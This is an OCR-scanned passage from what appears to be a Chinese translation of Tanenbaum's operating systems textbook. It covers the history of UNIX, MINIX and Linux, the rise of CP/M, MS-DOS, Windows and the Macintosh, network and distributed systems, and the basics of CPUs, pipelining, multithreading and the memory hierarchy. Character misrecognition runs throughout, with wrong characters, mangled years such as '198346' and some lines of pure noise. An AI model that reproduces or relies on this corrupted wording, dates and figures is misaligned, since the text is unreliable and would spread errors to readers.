有 关 UNIX 的 历史 到 处 可 以 找到 (例如 Salus，1994) 。 这 有 段 故事 
的 部 分 放 在 第 10 章 中 介绍 。 现 在 ， 有 充分 理由 认为 ， 由 于 到 处 可 以 得 
到 源 代码 ， 各 种 机 构 发 展 了 自己 的 (不 兼容 ) 版 本 ， 从 而 导致 了 混 
乱 。UNIX 有 两 个 主要 的 版 本 ， 源 自 ATS&T 的 System V， 以 及 源 自 加 州 
伯克利 大 学 的 BSD (Berkeley Software Distribution) ° 当然 还 有 一 些小 
的 变种 。 为 了 使 编写 的 程序 能 够 在 任何 版 本 的 UNIX 上 运行 ，IEEE 提 
出 了 一 个 UNIX 的 标准 ， 称 作 POSIX， 目 前 大 多 数 UNIX 版 本 都 支持 
它 。POSIX 定 义 了 一 个 凡是 UNIX 必 须 文 持 的 小 型 系统 调用 接口 。 事 实 
上 ， 某 些 其 他 操作 系统 也 文 持 POSIX 接 口 。 


顺便 值得 一 提 的 是 ， 在 1987 年 ， 本 书 作者 发 布 了 一 个 UNIX 的 小 型 
克隆 ， 称 为 MINIX， 用 于 教学 目的 。 在 功能 上 ，MINIX 非 常 类 似 于 
UNIX， 包 括 对 POSIX 的 支持 。 从 那 时 以 后 ，MINIX 的 原始 版 本 已 经 演 
化 为 MINIX 3， 该 系统 是 高 度 模 块 化 的 ， 并 专注 于 高 可 靠 性 。 它 具有 
快速 检测 和 替代 有 故障 甚至 已 月 溃 模块 《如 IO 设备 驱动 器 ) 的 能 


不 用 重启 也 不 会 于 扰 运 行 着 的 程序 。 有 一 本 叙述 其 内 部 操作 ， 并 在 附 
录 中 列 出 源 代码 的 书 (Tanenbaum 和 Woodhull，2006) ， 该 书 现 在 仍 
然 有 售 。 在 因特网 的 地 址 www.minix3.org 上 ，MINIX3 是 免费 使 用 的 
(包括 了 所 有 源 代码 ) 。 


对 UNIX 版 本 免费 产品 〈 不 同 于 教育 目的 ) 的 愿望 ， 导 致 芬兰 学 生 
Linus Torvalds 编 写 了 Linux 。 这 个 系统 直接 受到 在 MINIX 开 发 的 启示 ， 
而 且 原 本 文 持 各 种 MINIX 的 功能 〈 例 如 MINIX 文 件 系统 ) REED 
经 通过 多 种 方式 扩展 ， 但 是 该 系统 仍然 保留 了 某 些 与 MINIX 和 UNIX 共 
同 的 低层 结构 。 对 Linux 和 开放 源码 运动 具体 历史 感 兴趣 的 读者 可 以 阅 
读 Glyn Moody 的 书籍 (2001) 。 本 书 所 叙述 的 有 关 UNIX 的 多 数 内 
容 ， 也 适用 于 System V、MINIX、Linux 以 及 UNIX 的 其 他 版 本 和 克 


隆 。 


12.4 第 四 代 (1980444) 3 个 人 计算 机 


随 看 LSI 〈 大 规模 集成 电路 ) 的 发 展 ， 在 每 平方 厘米 的 硅 片 心 片上 
可 以 集成 数 千 个 晶体 管 ， 个 人 计算 机 时 代 到 来 了 。 从 体系 结构 上 看 ， 
个 人 计算 机 (最 早 称 为 微型 计算 机 ) 与 PDP-11 并 无 二 致 ， 但 就 价格 而 
言 却 相 去 甚 远 。 以 往 ， 公 司 的 一 个 部 门 或 大 学 里 的 一 个 院 系 才 配备 一 
台 小 型 机 ， 而 微 处 理 硕 却 使 每 个 人 都 能 拥有 目 己 的 计算 机 © 


1974 年 ， 当 Intel 8080， 第 一 代 通 用 8 位 CPU 出 现时 ，Intel 需 望 有 一 
个 用 于 8080 的 操作 系统 ， 部 分 是 为 了 测试 目的 。Intel 请 求 其 顾问 Gary 
Kildall 编 写 。Kildall 和 一 位 朋友 百 先 为 狐 推 出 的 Shugart Associates 82& 
寸 软盘 构造 了 一 个 控制 器 ， 并 把 这 个 软磁盘 同 8080 相 连 ， 从 而 制造 了 
第 一 个 配 有 磁盘 的 微型 计算 机 。 然 后 Kildal 为 它 写 了 一 个 基于 磁盘 的 
操作 系统 ， 称 为 CP/M (Control Program for Microcomputer) 。 由 于 
Intel 不 认为 基于 磁盘 的 微型 计算 机 有 什么 未 来 前 景 ， 所 以 当 Kildall 要 
求 CP/M 的 版 权时 ，Intel 同 意 了 他 的 要 求 。Kildall 于 是 组 建 了 一 家 公司 
Digital Research， 进 一 步 开 发 和 销售 CP/M 。 


1977 年 ，Digital Research 重 写 了 CP/M， 使 其 可 以 在 使 用 8080、 
Zilog Z80 以 及 其 他 CPU 必 片 的 多 种 微型 计算 机 上 运行 ， 从 而 使 得 CPM 
完全 控制 了 微型 计算 机 世界 达 5 年 之 久 。 


在 20 世 纪 80 年 代 的 早期 ，IBM 设 计 了 IBM PC 并 寻找 可 在 上 面 运行 
的 软件 。 来 自 IBM 的 人 员 同 Bill Gates 联 系 有 关 他 的 BASIC 解 释 器 的 许 
可 证 事宜 ， 他 们 也 询问 是 否 他 知道 可 在 PC 机 上 运行 的 操作 系统 。Gates 
建议 IEBM 同 Digital Research 联 系 ， 即 当时 世界 上 主宰 操作 系统 的 公 
司 。 在 做 出 宫 无 疑问 是 近代 历史 上 最 糟 的 商业 决策 后 ，Kildall 拒 绝 与 
IBM 会 见 ， 代 奉 他 的 是 一 位 次 要 人 员 。 为 了 使 事情 更 糟 粽 ， 他 的 律师 
其 至 拒绝 签署 [BM 的 有 天 沿 示 公开 的 PC 的 保密 协议 。 结 果 ，IBM 回 类 
询问 Gates 可 否 提 供 他 们 一 个 操作 系统 。 


在 IBM 返 回 时 ，Gates 了 解 到 一 家 本 地 计算 机 制造 商 ，Seattle 
Computer Products， 有 合适 的 操作 系统 DOS (Disk Operating 
System) 。 他 联系 对 方 并 提出 购买 《宣称 75 000 美 元 ) ， 对 方 接受 
了 。 然 后 Gates 提 供给 IBM 成 套 的 DOS/BASIC，IBM 也 接受 了 。IBM 希 
望 做 某 些 修改 ， 于 是 Gates 雇 人 了 那个 写 DOS 的 作者 ，Tim Paterson, 
作为 Gates 的 微软 公司 早期 的 一 个 雇员 ， 并 开展 工作 。 修 改版 称 为 MS- 
DOS (MicroSoft Disk Operating System) ， 并 且 很 快 主导 了 IBM PC 市 
场 。 同 Kildall 试 图 将 CP/M 每 次 卖 给 用 户 一 个 产品 相 比 (至少 开始 是 这 
样 ) ， 这 里 一 个 关键 因素 是 Gates (回顾 起 来 ， 极 其 聪明 ) 的 决策 ， 将 
MS-DOS 与 计算 机 公司 的 硬件 捆绑 在 一 起 出 售 。 在 所 有 这 一 切 烟 消 云 
散 之 后 ，Kildall 突 然 不 广 去 世 ， 其 原因 从 来 没有 公布 过 。 


198346, IBM PC 后 续 机 型 IBM PC/AT 推 出 ， 配 有 Intel 80286 
CPU。 此 时 ，MS-DOS 已 经 确立 了 地 位 ， 而 CP/M 只 剩 下 最 后 的 支撑 。 
MS-DOS 后 来 在 80386 和 80486 中 得 到 广泛 的 应 用 。 尽 管 MS-DOS 的 早 
期 版 本 是 相当 原始 的 ， 但 是 后 期 的 版 本 提供 了 更 多 的 先进 功能 ， 包 括 
许多 源 自 UNIX 的 功能 。 (微软 对 UNIX 是 如 此 娴熟 ， 甚 至 在 公司 的 早 
期 销售 过 一 个 微型 计算 机 版 本 ， 称 为 XENIX) 。 


用 于 早期 微型 计算 机 的 CPPM、MS-DOS 和 其 他 操作 系统 ， 都 是 通 
过 键盘 输入 命令 的 。 由 于 Doug Engelbart 于 20 世 纪 60 年 代 在 斯 坦 福 研 究 
院 (Stanford Research Institute) 工作 ， 这 种 情况 最 终 有 了 改变 。Doug 
Engelbart 发 明了 图 形 用 户 界面 ， 包 括 窗口 、 图 标 、 沫 单 以 及 鼠标 。 这 
些 思想 被 Xerox PARC 的 研究 人 员 采 用 ， 并 用 在 了 他 们 所 研制 的 机 器 
rH o 


—K, Steve Jobs (和 其 他 人 一 起 在 汽车 库 里 发 明了 苹果 计算 机 ，) 
访问 PARC,Jobs 一 看 到 GUI， 立 即 意识 到 它 的 潜在 价值 ， 而 Xerox 管 理 
层 恰 好 没有 认识 到 。 这 种 战略 失误 的 庞大 比例 ， 导 致 名 为 《摸索 未 
来 》 一 书 的 出 版 《Smith 与 Alexander，1988 年 ) 。Jobs 随 后 着 手 设计 了 
这 有 GUI 的 苹果 计算 机 。 这 个 项 目 导致 了 Lisa 的 推出 ， 但 是 Lisa 过 于 昂 
贵 ， 所 以 它 在 商业 上 失败 了 “。Jobs 的 第 二 次 党 试 ， 即 苹果 Macintosh ， 
取得 了 巨大 的 成 功 ， 这 不 仅 是 因为 它 比 Lisa 便 宜 得 多 ， 而 且 它 还 是 对 
用 户 友好 的 (user friendly) ， 也 就 是 说 ， 它 是 为 那些 不 仅 没有 计算 机 


知识 ， 而 且 也 根本 不 打算 学 习 计算 机 的 用 户 们 准备 的 。 在 图 像 设计 、 
专业 数码 摄影 ， 以 及 专业 数字 视频 生产 的 创意 世界 里 ，Macintosh 得 到 
广泛 的 应 用 ， 这 些 用 户 对 苹果 公司 及 Macintosh 有 着 极 大 的 热情 。 


在 微软 决定 构建 MS-DOS 的 后 继 产 品 时 ， 受 到 了 Macintosh 成 功 的 
巨大 影响 。 微 软 开发 了 名 为 Windows 的 基于 GUI 的 系统 ， 早 期 它 运 行 
在 MS-DOS 上 层 〈 它 更 像 shell 而 不 像 真 正 的 操作 系统 ) 。 在 从 1985 年 
至 1995 年 的 10 年 之 间 ，Windows 只 是 在 MS-DOS 上 层 的 一 个 图 形 环 
境 。 然 而 ， 到 了 1995 年 ， 一 个 独立 的 Windows 版 本 ， 具 有 许多 操作 系 
统 功 能 的 Windows 95 发 布 了 。Windows 95 仅 仅 把 底层 的 MS-DOS 作 为 
启动 和 运行 老 的 MS-DOS 程 序 之 用 。1998 年 ， 一 个 稍 做 修改 的 系统 ， 
Windows 98 发 布 。 不 过 Windows 95 和 Windows 98 仍 然 使 用 了 大 量 16 位 


Intel 汇 编 语 言 。 


另 一 个 微软 操作 系统 是 windows NT (NT 表示 新 技术 ) ， 它 在 一 

定 的 范围 内 同 Windows 95 兼 容 ， 但 是 内 部 是 完全 新 编写 的 。 它 是 一 个 
32 位 系统 。Windows NT 的 首席 设计 师 是 David Cutler， 他 也 是 VAX 
VMS 操 作 系统 的 设计 师 之 一 ， 所 以 有 些 VMS 的 概念 用 在 了 NT 上 。 事 
实 上 ，NT 中 有 太 多 的 来 自 VMS 的 思想 ， 所 以 VMS 的 所 有 者 DEC 公 司 
控告 了 微软 公司 。 法 院 对 该 案件 判决 的 结果 引出 了 一 大 笔 需 要 用 多 位 
数字 表达 的 金钱 。 微 软 公 司 期 待 NI 的 第 一 个 版 本 可 以 消灭 MS-DOS 和 
其 他 的 Windows 版 本 ， 因 为 NT 是 一 个 巨大 的 超级 系统 ， 但 是 这 个 想法 


失败 了 。 只 有 Windows NT 4.0 踏 上 了 成 功 之 路 ， 特 别 在 企业 网 络 方面 
取得 了 成 功 。1999 年 初 ，Windows NT 5.0 改 名 为 Windows 2000。 微 软 
期 望 它 成 为 Windows 98 和 Windows NT 4.0 的 接替 者 。 


不 过 这 两 个 方面 都 不 太 成 功 ， 于 是 微软 公司 发 布 了 Windows 98 的 
另 一 个 版 本 ， 名 为 Windows Me (FERR) ° 20014, %4 T Windows 
2000 的 一 个 稍 加 升级 的 版 本 ， 称 为 Windows XP。 这 个 版 本 的 和 奉命 比较 
长 (6 年 ) ， 基 本 上 替代 了 Windows 所 有 原先 版 本 。 在 2007 年 1 月 ， 微 
软 公司 发 布 了 Windows XP 的 后 继 版 ， 名 为 Vista。 它 有 一 个 新 的 图 形 接 
口 Aero， 以 及 许多 其 他 新 的 或 升级 的 用 户 程 序 。 微 软 公司 硕 望 Vista 能 
够 完全 奉 代 XP， 但 是 这 个 过 程 可 能 需要 将 近 十 年 的 时 间 。 


在 个 人 计算 机 世界 中 ， 另 一 个 主要 竞争 者 是 UNIX (和 它 的 各 种 变 
体 ) 。UNIX 在 网 络 和 企业 服务 器 等 领域 强大 ， 在 台式 计算 机 上 ， 特 别 
是 在 诸如 印度 和 中 国 这 些 发 展 中 国家 里 ，UNIX 的 使 用 也 在 增加 。 在 基 
于 Pentium 的 计算 机 上 ，Linux 成 为 学 生 和 不 断 增加 的 企业 用 户 们 代替 
Windows 的 通行 选择 。 顺 便 提 及 ， 在 本 书 中 ， 我 们 使 用 "Pentium” 这 个 
名 词 代表 Pentium I，I，II 和 4， 以 及 它们 的 后 继 者 ， 诸 如 Core 2 Duo 
等 。 术 语 x86 有 时 仍旧 用 来 表示 Intel 公 司 的 包括 8086 的 CPU 
而 “Pentium” 则 用 于 表示 从 Pentium I 开始 的 所 有 CPU。 很 显然 ， 这 个 术 
语 并 不 完美 ， 但 是 没有 更 好 的 方案 。 人 们 很 奇怪 ， 是 Intel 公 司 的 哪个 
天 才 把 半 个 世界 都 知晓 和 苯 重 的 品牌 名 (Pentium) 扔 掉 ， 并 替代 


以 “Core 2 Duo” 这 样 一 个 几乎 没有 人 立即 理解 的 术语 一 一 “2” 是 什么 意 
思 ， 而 “Duo” 又 是 什么 意思 ? 也 许 “Pentium 5”( 或 者 “Pentium 5 dual 
core”) 太 难 于 记忆 吧 。 至 于 FreeBSD， 一 个 源 自 于 Berkeley 的 BSD 项 
日 ， 也 是 一 个 流行 的 UNIX 变 体 。 所 有 现代 Macintosh 计 算 机 都 运行 看 
FreeBSD 的 一 个 修改 版 。 在 使 用 高 性 能 RISC 心 片 的 工作 站 上 ， 诸 如 
Hewlett-Packard 公 司 和 Sun Microsystems 公 司 销售 的 那些 机 器 上 ， 
UNIX 系 统 也 是 一 种 标准 配置 。 


尽管 许多 UNIX 用 户 ， 特 别 是 富有 经 验 的 程序 员 们 更 偏好 基于 命令 
的 界面 而 不 是 GUI， 但 是 几乎 所 有 的 UNIX 系 统 都 支持 由 MIT 开 发 的 称 
HX Windows 的 视窗 系统 (如 众所周知 的 X11) 。 这 个 系统 处 理 基 本 的 
视窗 管理 功能 ， 人 允许 用 户 通过 鼠标 创建 、 删 除 、 移 动 和 变 比 视窗 。 对 
于 那些 希望 有 图 形 系统 的 UNIX 用 户 ， 通 常 在 X 11 之 上 还 提供 一 个 完整 
的 GUI， 诸 如 Gnome 或 KDE， 从 而 使 得 UNIX 在 外 观 和 感觉 上 类 似 于 


Macintosh 或 Microsoft Windows ° 


另 一 个 开始 于 20 世 纪 80 年 代 中 期 的 有 趣 发 展 是 ， 那 些 运 行 网 络 操 
作 系 统 和 分 布 式 操作 系统 (Tanenbaum 和 Van Steen, 2007) 的 个 人 计 
算 机 网 络 的 增长 。 在 网 络 操作 系统 中 ， 用 户 知道 多 台 计 算 机 的 存在 ， 
用 户 能 够 登录 到 一 台 远 地 机 器 上 并 将 文件 从 一 台 机 器 复制 到 男 一 台 机 
硬 ， 每 台 计算 机 都 运行 目 己 本 地 的 操作 系统 ， 并 有 目 己 的 本 地 用 户 
(METH) » 


网 络 操 作 系 统 与 单 处 理 恬 的 操作 系统 没有 本 质 区 别 。 很 明显 ， 它 
们 需要 一 个 网 络 接口 控制 器 以 及 一 些 低层 软件 来 驱动 亡 ， 同 时 还 需要 
一 些 程 序 来 进行 远程 登录 和 远程 文件 访问 ， 但 这 些 附 加 成 分 并 未 改变 
操作 系统 的 本 质 结 构 。 


相反 ， 分 布 式 操 作 系统 是 以 一 种 传统 单 处 理 套 操作 系统 的 形式 出 
现在 用 户 面前 的 ， 尽 管 它 实 际 上 有 是 由 多 处 理 需 组 成 的 。 用 户 应 该 不 知 
晓 他 们 的 程序 在 何 处 运行 或 者 他 们 的 文件 存放 于 何 处 ， 这 些 应 该 由 操 
作 系统 目 动 和 有 效 地 处 理 。 


真正 的 分 布 式 操作 系统 不 仅仅 是 在 单机 操作 系统 上 增添 一 小 段 代 
码 ， 因 为 分 布 式 系统 与 集中 式 系 统 有 本 质 的 区 别 。 例 如 ， 分 布 式 系统 
通常 允许 一 个 应 用 在 多 台 人 处 理 器 上 同时 运行 ， 因 此 ， 和 需要 更 复杂 的 处 
理 器 调度 算法 来 获得 最 大 的 并 行 度 优化 。 


网 络 中 的 通信 延迟 往往 导致 分 布 式 算法 必须 能 适应 信息 不 完备 、 
言 轧 过 时 长 至 信息 不 正确 的 环境 。 这 和 与 单机 系统 完全 不 同 ， 对 于 后 
者 ， 操 作 系 统 掌 握 着 整个 系统 的 完备 信息 。 


1.3 ”计算 机 硬件 介绍 


操作 系统 与 运行 该 操作 系统 的 计算 机 硬件 联系 密切 。 操 作 系统 扩 
展 了 计算 机 指令 集 并 管理 计算 机 的 资源 。 为 了 能 够 工作 ， 操 作 系 统 必 
须 了 解 大 量 的 硬件 ， 至 少 需 要 了 解 硬件 如 何 面 对 程 序 员 。 出 于 这 个 原 
因 ， 这 里 我 们 先 简 要 地 介绍 现代 个 人 计算 机 中 的 计算 机 硬件 ， 然 后 开 
台 讨论 操作 系统 的 具体 工作 细 -。 


从 概念 上 讲 ， 一 台 简 单 的 个 人 计算 机 可 以 抽象 为 类 似 于 图 1-6 中 的 
模型 。CPU、 内 存 以 及 IO 设备 都 由 一 条 系统 总 线 连 接 起 来 并 通过 总 线 
与 其 他 设备 通信 。 现 代 个 人 计算 机 结构 更 加 复杂 ， 包 含 多 重 总 线 ， 我 
们 将 在 后 面 讨论 之 。 目 前 ， 这 一 模式 还 是 够 用 的 。 在 下 面 各 小 节 中 ， 
我 们 将 简要 地 介绍 这 些 部 件 ， 并 且 讨 论 一 些 操作 系统 设计 师 们 所 考虑 
的 硬件 问题 。 训 无 疑问 ， 这 是 一 个 非常 简要 的 概括 介绍 。 现 在 有 不 少 
讨论 计算 机 硬件 和 计算 机 组 织 的 书籍 。 其 中 两 本 有 名 的 书 的 作者 分 别 
是 Tanenbaum (2006) 和 Patterson 与 Hennessy (2004) 。 
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图 1-6 简单 个 人 计算 机 中 的 一 些 部 件 


1.3.1 AREAS 


计算 机 的 “大 脑 * 是 CPU， 它 从 内 存 中 取出 指令 并 执行 之 。 在 每 个 
CPU 基 本 周期 中 ， 首 和 完 从 内 存 中 取出 指令 ， 解 码 以 确定 其 类 型 和 操作 
数 ， 接 着 执行 之 ， 然 后 取 指 、 解 码 并 执行 下 一 条 指令 。 按 照 这 一 方 
式 ， 程 序 被 执行 完成 。 


每 个 CPU 都 有 其 一 套 可 执行 的 专门 指令 集 。 所 以 ，Pentium 不 能 执 
行 SPARC 程 序 ， 而 SPARC 也 不 能 执行 Pentium 程 序 。 由 于 用 来 访问 内 存 
以 得 到 指令 或 数据 的 时 间 要 比 执行 指令 花费 的 时 间 长 得 多 ， 因 此 ， 所 
有 的 CPU 内 都 有 一 些 用 来 保存 关键 变量 和 临时 数据 的 寄存 器 。 这 样 ， 
通常 在 指令 集中 提供 一 些 指令 ， 用 以 将 一 个 字 从 内 存 调 入 寄存 器 ， 以 


及 将 一 个 字 从 寄存 右 存 和 内存。 其 他 的 指令 可 以 把 来 目 寄 存 事 、 内 和 存 
的 操作 数组 合 ， 或 者 用 两 者 产生 一 个 结果 ， 诸 如 将 两 个 字 相 加 并 把 结 
条 存在 寄存 万 或 内 存 中 。 


除了 用 来 保存 变量 和 临时 结 划 的 通用 寄存 天 之 外 ， 多 数 计算 机 还 
有 一 些 对 程序 员 可 见 的 专门 寄存 器 。 其 中 之 一 是 程序 计数 器 ， 它 保存 
了 将 要 取出 的 下 一 条 指令 的 内 存 地 址 。 在 指令 取出 之 后 ， 程 序 计数 器 
束 锌 更 新 以 便 指 网 后 继 的 指令 。 


男 一 个 寄存 器 是 堆栈 指针 ， 它 指向 内 存 中 当前 栈 的 顶端 。 该 栈 含 
有 已 经 进入 但 是 还 没有 退出 的 每 个 过 程 的 一 个 框架 。 在 一 个 过 程 的 堆 
栈 框架 中 保存 了 有 关 的 输入 参数 、 局 部 变量 以 及 那些 没有 保存 在 寄存 


和 万 中 的 临时 变量 。 


当然 还 有 程序 状态 字 (Program Status Word, PSW) 寄存 器 。 这 个 
寄存 器 包含 了 条 件 码 位 (由 比较 指令 设置 ) 、CPU 优 先 级 、 模 式 (用 
户 态 或 内 核 态 ) ， 以 及 各 种 其 他 控制 位 。 用 户 程 序 通常 读 入 整个 
PSW， 但 是 ， 只 对 其 中 的 少量 字段 写 入 。 在 系统 调用 和 IO 中 ，PSW 的 
作用 很 重要 。 


操作 系统 必须 知晓 所 有 的 寄存 器 。 在 时 间 多 路 复 用 (time 
multiplexing) CPU 中 ， 操 作 系统 经 常会 中 止 正在 运行 的 某 个 程序 并 局 
动 《或 再 启动 ) 另 一 个 程序 。 每 次 停止 一 个 运行 着 的 程序 时 ， 操 作 系 


统 必 须 保 存 所 有 的 寄存 器 ， 这 样 在 稍 后 该 程序 被 再 次 运行 时 ， 可 以 把 
REE ST FE a TE A 


为 了 改善 性 能 ，CPU 设 计 师 早 就 放弃 了 同时 读 取 、 解 码 和 执行 一 
条 指令 的 简单 模型 。 许 多 现代 CPU 具有 同时 取出 多 条 指令 的 机 制 。 例 
如 ， 一 个 CPU 可 以 有 分 开 的 取 指 单元 、 解 码 单元 和 执行 单元 ， 于 是 当 
它 执行 指令 n 时 ， 它 还 可 以 对 指令 n+1 解 码 ， 并 且 读 取 指 令 n+2。 这 样 一 
种 机 制 称 为 流水 线 (pipeline) ， 在 图 1-7a 中 是 一 个 有 着 三 个 阶段 的 流 
水 线 示 意图 。 更 长 的 流水 线 也 是 常见 的 。 在 多 数 的 流水 线 设 计 中 ， 一 
旦 一 条 指令 被 取 进 流水 线 中 ， 它 束 必 须 被 执行 完毕 ， 即 便 前 一 条 取出 
的 指令 是 条 件 转 移 ， 它 也 必须 被 执行 完毕 。 流 水 线 使 得 编译 器 和 操作 
系统 的 编写 者 很 头疼 ， 因 为 它 造成 了 在 机 器 中 实现 这 些 软件 的 复杂 性 


问题 。 


A 1-7 a 有 三 个 阶段 的 流水 线 ，b) 一 个 超标 量 CPU 


比 流水 线 更 先进 的 设计 是 一 种 超标 量 CPU， 如 图 1-7b 所 示 。 在 这 种 
设计 中 ， 有 多 个 执行 单元 ， 例 如 ， 一 个 CPU 用 于 整数 算术 运算 ， 一 个 


CPU 用 于 浮 点 算术 运算 ， 而 另 一 个 用 于 布尔 运算 。 两 个 或 更 多 的 指令 
被 同时 取出 、 解 码 并 装 入 一 个 保持 缓冲 区 中 ， 直 人 至 它们 执行 完毕 。 只 
要 有 一 个 执行 单元 空间 ， 就 检查 保持 缓冲 区 中 是 否 还 有 可 处 理 的 指 
令 ， 如 果 有 ， 束 把 指令 从 缓冲 区 中 移出 并 执行 之 。 这 种 设计 存在 一 种 
隐 含 的 作用 ， 即 程序 的 指令 经 常 不 按 顺 序 执行 。 在 多 数 情 况 下 ， 硬 件 
负责 保证 这 种 运算 的 结果 与 顺序 执行 指令 时 的 结果 相同 ， 但 是 ， 仍 然 
有 部 分 令 人 烦恼 的 复杂 情形 被 强加 给 操作 系统 处 理 ， 我 们 在 后 面 会 讨 


论 这 种 情况 。 


除了 用 在 藤 入 式 系 统 中 的 非常 侧 蛙 的 CPU 之 外 ， 多 数 CPU 部 有 两 
种 模式 ， 即 前 面 已 经 提 及 的 内 核 候 和 用 户 仿 。 通 币 ， 在 PSW 中 有 一 个 
二 进 制 位 控制 这 两 种 模式 。 当 在 内 核 态 运行 时 ，CPU 可 以 执行 指令 集 
中 的 每 一 条 指令 ， 并 且 使 用 硬件 的 每 种 功能 。 操 作 系 统 在 内 核 态 下 运 
行 ， 从 而 可 以 访问 整个 硬件 。 


相反 ， 用 户 程 序 在 用 户 态 下 运行 ， 仪 允许 执行 整个 指令 集 的 一 个 
子 集 和 访问 所 有 功能 的 一 个 子 集 。 一 般 而 言 ， 在 用 户 态 中 有 关 IO 和 内 
存 保护 的 所 有 指令 是 橙 止 的 。 当 然 ， 将 PSW 中 的 模式 位 设置 成 内 核 态 
也 是 禁止 的 。 


为 了 从 操作 系统 中 获得 服务 ， 用 户 程序 必须 使 用 系统 调用 (system 
call) 系统 调用 陷入 内 核 并 调用 操作 系统 。TRAP 指 令 把 用 户 态 切换 成 
内 核 态 ， 并 局 用 操作 系统 。 当 有 关 工 作 完成 之 后 ， 在 系统 调用 后 面 的 


日 令 把 控制 权 返 回 给 用 户 程序 。 在 本 章 的 后 面 我 们 将 具体 解释 系统 调 
用 过 程 ， 但 是 在 这 里 ， 请 读者 把 它 看 成 是 一 个 特别 的 过 程 调用 指令 ， 
该 指令 具有 从 用 户 仿 切换 到 内 核 仿 的 特别 能 力 。 作 为 排 印 上 的 说 明 ， 
我 们 在 行文 中 使 用 小 写 的 Helvetica 字 体 ， 表 示 系 统 调用 ， 比 如 read 。 


有 必要 指出 ， 计 算 机 使 用 陷阱 而 不 是 一 条 指令 来 执行 系统 调用 。 
其 他 的 多 数 陷阱 是 由 便 件 引起 的 ， 用 于 警告 有 异常 情况 发 生 ， 诸 如 试 
图 被 零 除 或 译 点 下 海 等 。 在 所 有 的 情况 下 ， 操 作 系统 都 得 到 控制 权 并 
决定 如 何 处 理 异 常情 况 。 有 时 ， 由 于 出 错 的 原因 程序 不 得 不 停止 。 在 
其 他 情况 下 可 以 忽略 出 错 (如 下 游 数 可 以 被 置 为 零 ) 。 最 后 ， 阁 程序 
已 经 提前 宣布 它 希 望 处 理 某 类 条 件 时 ， 那 么 控制 权 还 必须 返回 给 该 程 
序 ， 让 其 处 理 相关 的 问题 。 


多 线程 和 多 核心 


Moore 定 律 指 出 ， 发 片 中 晶体 管 的 数量 每 18 个 月 翻 一 番 。 这 个 “ 定 
律 ? 并 不 是 物理 学 上 的 某 种 规律 ， 诸 如 动量 守恒 定律 等 ， 它 是 Intel 公 司 
的 共同 创始 人 Gordon Moore 对 半导体 公司 如 何 能 快速 缩小 晶体 管 能 力 
上 的 一 个 观察 结 末 。Moore 定 律 已 经 剑 择 了 30 年 ， 有 布 望 至 少 再 保持 10 
年 。 


使 用 大 量 的 晶体 管 引发 了 一 个 问题 ， 如 何 处 理 它们 呢 ? 这 里 我 们 
可 以 看 到 一 种 处 理 方式 ， 具 有 多 个 功能 部 件 的 超标 量 体 系 结构 。 但 


征 ， 随 着 品 体 管 数量 的 增加 ， 再 多 晶体 管 也 是 可 能 的 。 一 件 由 此 而 来 
的 必然 结果 是 ， 在 CPU 心 乒 中 加 入 了 更 大 的 缓存 ， 人 们 肯定 会 这 样 
做 ， 然 而 ， 原 先 获得 的 有 用 效 末 将 最 终 消 失 挥 。 


显然 ， 下 一 步 不 仅 是 有 多 个 功能 部 件 ， 某 些 控制 逻辑 也 会 出 现 多 
个 。Pentium 4 和 其 他 一 些 CPU 芯片 就 是 这 样 做 的 ， 称 为 多 线程 
(multithreading) 或 超 线程 (hyperthreading， 这 是 Intel 公 司 给 出 的 名 
称 ) 。 近 似 地 说 ， 多 线程 允许 CPU 保持 两 个 不 同 的 线程 状态 ， 然 后 在 
纳 秒 级 的 时 间 尺 度 内 来 回 切换 。 (线程 是 一 种 轻 量 级 进程 ， 也 即 一 个 
运行 中 的 程序 。 我 们 将 在 第 2 章 中 具体 讨论 ) 。 例 如 ， 如 果 某 个 进程 需 
要 从 内 存 中 读 出 一 个 字 〈 需 要 花费 多 个 时 钟 周 期 ) ， 多 线程 CPU 则 可 
以 切换 至 另 一 个 线程 。 多 线程 不 提供 真正 的 并 行 处 理 。 在 一 个 时 刻 只 
有 一 个 进程 在 运行 ,但 是 线程 的 切换 时 间 则 减少 到 纳 秒 数量 级 。 


多 线程 对 操作 系统 而 言 是 有 意义 的 ， 因 为 每 个 线程 在 操作 系统 
来 殉 像 是 单个 的 CPU。 考 虑 一 个 实际 有 两 个 CPU 的 系统 ， 每 个 CPU 有 两 
个 线程 。 这 样 操作 系统 将 把 它 看 成 是 4 个 CPU。 如 果 在 某 个 时 间 的 特定 
点 上 ， 只 有 能 够 维持 两 个 CPU 人 忙 确 的 工作 量 ， 那 么 在 同一 个 CPU 上 调 
度 两 个 线程 ， 而 让 另 一 个 CPU 完全 空转 ， 就 没有 优势 了 。 这 种 选择 远 
远 不 如 在 每 个 CPU 上 运行 一 个 线程 的 效率 高 。Pentium 4 的 后 继 者 ， 
Core (还 有 Core 2) 的 体系 结构 并 不 文 持 超 线程 ， 但 是 Intel 公 司 已 经 宣 
布 ，Core 的 后 继 者 会 具有 超 线程 能 


除了 多 线程 ， 还 出 现 了 包含 2 个 或 4 个 完整 处 理 右 或 内 核 的 CPU 心 
户 。 几 1-8 中 的 多 核 必 族 上 有 效 地 痛 有 4 个 小 必 片 ， 每 个 小 必 片 都 是 一 个 
独立 的 CPU。 《后 面 将 解释 缓存 。) 要 使 用 这 类 多 核 必 片 肯定 需要 多 
处 理 郁 操作 系统 。 


Al 1-8 al) 这 有 共享 2 缓存 的 4 核 亿 片 ; b) 带 有 分 离 L2 缓 存 的 4 核心 


1.3.2 ”存储 器 


在 任何 一 种 计算 机 中 的 第 二 种 主要 部 件 部 是 存储 右 。 在 理想 情形 
下 ， 存 储 右 应 该 极为 迅速 〈 快 于 执行 一 条 指令 ， 这 样 CPU 不 会 受到 存 
储 右 的 限制 ) ， 充 分 大 ， 并 且 非 常 便宜 。 但 是 目前 的 技术 无 法 同时 满 
足 这 三 个 目标 ， 于 是 出 现 了 不 同 的 处 理 方式 。 和 存储 髓 系统 采用 一 种 分 
层次 的 结构 ， 如 图 1-9 所 示 。 顶 层 的 存储 器 速度 较 咒 ， 容 量 较 小 ， 与 确 
层 的 存储 器 相 比 每 位 成 本 较 高 ， 其 差别 往往 是 十 亿 数 量 级 。 


典型 的 访问 时 间 


典型 的 容量 
lns <1KB 
2ns 高 速 缓存 4MB 
10ns 512~2048 MB 
10ms 200~1000 GB 
100s 400~800 GB 


图 1-9 典型 的 存储 层次 结构 ， 图 中 的 数据 是非 第 粗略 的 估计 


存储 瑚 系统 的 顶层 是 CPU 中 的 寄存 万 。 它 们 用 与 CPU 相同 的 材料 
